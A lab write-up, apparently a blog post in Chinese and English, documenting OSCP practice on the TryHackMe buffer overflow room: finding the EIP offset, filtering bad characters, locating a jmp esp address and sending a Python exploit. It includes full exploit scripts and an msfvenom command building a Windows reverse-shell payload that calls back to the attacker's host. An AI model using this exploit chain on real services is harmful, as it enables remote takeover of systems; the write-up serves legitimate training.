OSCP report 练手之 - tryhackme bufferoverflow

临近 OSCP Exam了，做点 bufferoverflow 的靶机练练手。之前无意间在 twiiter 上看到了一个靶场，有 bof。遂来练手。顺便也练练 Report 的编写。

靶机地址：

https://tryhackme.com/room/bufferoverflowprep

这种是最基本的 BOF，没有保护什么的，都是走个流程就差不多了。

ps:

中途吃了个饭，重启了 lab machine。导致前后机器 ip 不一致了，不要在意。。。

Snooping around the target

Create a python script as exp. use msf-pattern_create to generate a string.

a@kali:~/Desktop/bof$ msf-pattern_create -l 1000

import socket

payload = "PAYLOAD"

s = socket.socket()
s.connect(('10.10.65.218', 1337))
print(s.recv(1024))
s.send('OVERFLOW2 '+payload)
s.close()

Note the value of EIP.

Use msf-pattern_offset to get the “eip” offset

a@kali:~/Desktop/bof$ msf-pattern_offset -l 1000 -q 76413176

[*] Exact match at offset 634

ensure “eip” offset

payload = "A"*634+"BBBB"

check bad chars.Delete “\x00,\x0a,\x0d first”

payload = "A"*634+"BBBB"+"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0B\x0C\x0E\x0F\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1A\x1B\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2A\x2B\x2C\x2D\x2E\x2F\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3A\x3B\x3C\x3D\x3E\x3F\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x5B\x5C\x5D\x5E\x5F\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x7B\x7C\x7D\x7E\x7F\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFB\xFC\xFD\xFE\xFF"

copy these chars,edit these like following (You can do it easily with “sublime text”):

create a python script to auto check bad char:

https://github.com/xiaopan233/OSCP-Script/blob/main/bof/badchars_check.py

rightChars = "\xXX\xXX\xXX......"  #the chars in python payload
memeryChars = "\xXX\xXX\xXX......" #chars from immunity debugger hex dump
flag = 1
for i in range(len(memeryChars)):
	if rightChars[i] != memeryChars[i]:
		print("[-] Find bad char!")
		print("[-] Current char: " + hex(ord(rightChars[i])))
		if i != 0:
			print("[-] Previous char: " + hex(ord(rightChars[i-1])))
		flag = 0
		break
if flag == 1:
	print("[+] Not Find bad char!")

Find a bad char “\x23“

from payload delete char “\x23“.

payload = "A"*634+"BBBB"+"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0B\x0C\x0E\x0F\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1A\x1B\x1C\x1D\x1E\x1F\x20\x21\x22\x24\x25\x26\x27\x28\x29\x2A\x2B\x2C\x2D\x2E\x2F\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3A\x3B\x3C\x3D\x3E\x3F\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x5B\x5C\x5D\x5E\x5F\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x7B\x7C\x7D\x7E\x7F\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFB\xFC\xFD\xFE\xFF"

Then resend payload again.Repeat above process.Until detect no bad char.

all detected bad chars following:

\x23, \x3c, \x83, \xba

Next step.Find jmp esp address.

type command “!mona modules“ to detect all modules.

We should note the dll which without protection.For me the best dll is from the vulnnerable application.

get the opcode of “jmp esp”

a@kali:~/Desktop$ msf-nasm_shell
nasm > jmp esp
00000000 FFE4 jmp esp

not only “jmp esp”,but there also are “jmp ebp”,”call esp”,“jmp eax” etc.

nasm > jmp ebp
00000000 FFE5 jmp ebp
nasm > call esp
00000000 FFD4 call esp
nasm > jmp eax
00000000 FFE0 jmp eax

Note that: use diffrent opcode, the shellcode location we put is diffrent too.

Here I use the first dll module “essfunc.dll”.head over to search the address of “jmp esp” opcode

We head over to test address “0x625011af“.

“jmp esp” will change eip to the address where esp pointed.

We can put some “\x90“ after “jmp esp” address in our payload to verify if it work.

change python payload to following:

payload = "A"*634+"\xaf\x11\x50\x62"+"\x90\x90\x90\x90\x90\x90\x90\x90" #note that return address should be reverse.0x625011af should be 0xaf115062

Check if it work in immunity debugger:

It worked!

Use msfvenom to generate shellcode.

command:

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.132.252 LPORT=443 -f python -b “\x00\x0a\x0d\x23\x3c\x83\xba”

modify our exp:

import socket

buf =  b""
......  # here are the shellcode which generated by msfvenom

payload = "A"*634+"\xaf\x11\x50\x62"+"\x90"*32+buf  #make sure there is some nop between shellcode and return address

s = socket.socket()
s.connect(('10.10.15.141', 1337))
print(s.recv(1024))
s.send('OVERFLOW2 '+payload)
s.close()

BOOM!!